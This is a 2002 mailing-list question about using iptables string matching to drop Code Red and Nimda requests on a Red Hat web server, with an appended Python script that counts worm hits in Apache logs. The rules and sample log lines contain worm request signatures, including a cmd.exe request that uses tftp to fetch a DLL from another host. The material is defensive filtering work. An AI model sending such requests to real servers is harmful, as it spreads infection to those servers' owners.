Filtering Code Red with Iptables & RH 7.3
From: Stevemeister (spamfree@area51.org)
Date: 06/16/02
- Next message: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
- Previous message: Ian Jones: "Re: RedHat security"
- Next in thread: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
- Reply: Luke Vogel: "Re: Filtering Code Red with Iptables & RH 7.3"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Stevemeister <spamfree@area51.org> Date: Sat, 15 Jun 2002 21:24:24 -0600
Hi everyone,
I'm running a small network with a dedicated firewall box running Red
Hat 7.3, two network cards, and an Iptables firewall ruleset by David
Ranch. I have a separate external www server on the local LAN running
Red Hat 7.3 and Apache. Everything works fine (port forwarding, DHCP,
Iptables, etc.). The problem is that my Apache server logs are being
overwhelmed by Code Red/Nimda requests. I know that these hits are
harmless to Linux, but they consume bandwidth and tend to render Website
statistics useless. The kind folks over in alt.apache.configuration
have come up with some nice solutions which redirect direct requests to
separate log files, but this doesn't eliminate the thousands of 404
replies which chew up limited bandwidth. So I have been looking for an
Iptables solution instead. I ran across the following article, whose
solution totally filtered my Nimda problem:
http://www.samag.com/documents/s=1824/sam0201h/0201h_s1.htm
But the requests for "default.ida" (Code Red?) continue. Here's the
code I added to my firewall ruleset:
# DROP HTTP packets related to CodeRed and Nimda
# viruses silently
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
-d $EXTIP --dport 80 -m string \
--string "/default.ida?" -j DROP
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
-d $EXTIP --dport 80 -m string \
--string ".exe?/c+dir" -j DROP
$IPTABLES -t filter -A INPUT -i $EXT_IFACE -p tcp \
-d $EXTIP --dport 80 -m string \
--string ".exe?/c+tftp" -j DROP
I'm not sure why this doesn't work for the first rule, as the second and
third rules work effectively. I've also tried changing the --string to
"default.ida", "NNNNNNNNNN", etc. but no joy. Anyway, sorry for the
long post. Any suggestions would be appreciated.
Thanks in advance
Stevemeister
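An added example, not part of Stevemeister's post: a small Python filter that scans Apache access-log lines for the same three signature strings the firewall rules look for, so you can measure how many Code Red and Nimda requests are still reaching the web server (and how many bytes go out in 404 replies) after the iptables rules are loaded. The log lines and IP addresses are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample lines in Apache common log format (hypothetical clients).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jun/2002:21:00:01 -0600] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 272
10.0.0.6 - - [15/Jun/2002:21:00:02 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
10.0.0.7 - - [15/Jun/2002:21:00:03 -0600] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2010.0.0.9%20GET%20cool.dll HTTP/1.0" 404 301
10.0.0.8 - - [15/Jun/2002:21:00:04 -0600] "GET /index.html HTTP/1.1" 200 1532
10.0.0.5 - - [15/Jun/2002:21:00:05 -0600] "GET /default.ida?XXXXXXXXXX HTTP/1.0" 404 272
"""

# The same substrings used in the --string rules from the post.
SIGNATURES = {
    "code_red": "/default.ida?",
    "nimda_dir": ".exe?/c+dir",
    "nimda_tftp": ".exe?/c+tftp",
}

# client, request URI, status code, response size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def classify_request(uri):
    """Return the name of the first signature found in the request URI, or None."""
    for name, needle in SIGNATURES.items():
        if needle in uri:
            return name
    return None


def summarize(log_text):
    """Count worm hits per signature and per client, plus bytes sent in 404 replies."""
    per_sig = Counter()
    per_client = Counter()
    wasted_bytes = 0
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        client, uri, status, size = m.groups()
        sig = classify_request(uri)
        if sig is None:
            continue
        per_sig[sig] += 1
        per_client[client] += 1
        if status == "404" and size.isdigit():
            wasted_bytes += int(size)
    return per_sig, per_client, wasted_bytes


if __name__ == "__main__":
    sigs, clients, wasted = summarize(SAMPLE_LOG)
    for name, n in sigs.most_common():
        print(f"{name:12s} {n}")
    print("noisiest clients:", clients.most_common(3))
    print("bytes sent in 404 replies to worm requests:", wasted)
```

Run it over the real access_log (`summarize(open("/var/log/httpd/access_log").read())`) before and after loading the rules; if the code_red count does not drop, the requests are getting past the first rule.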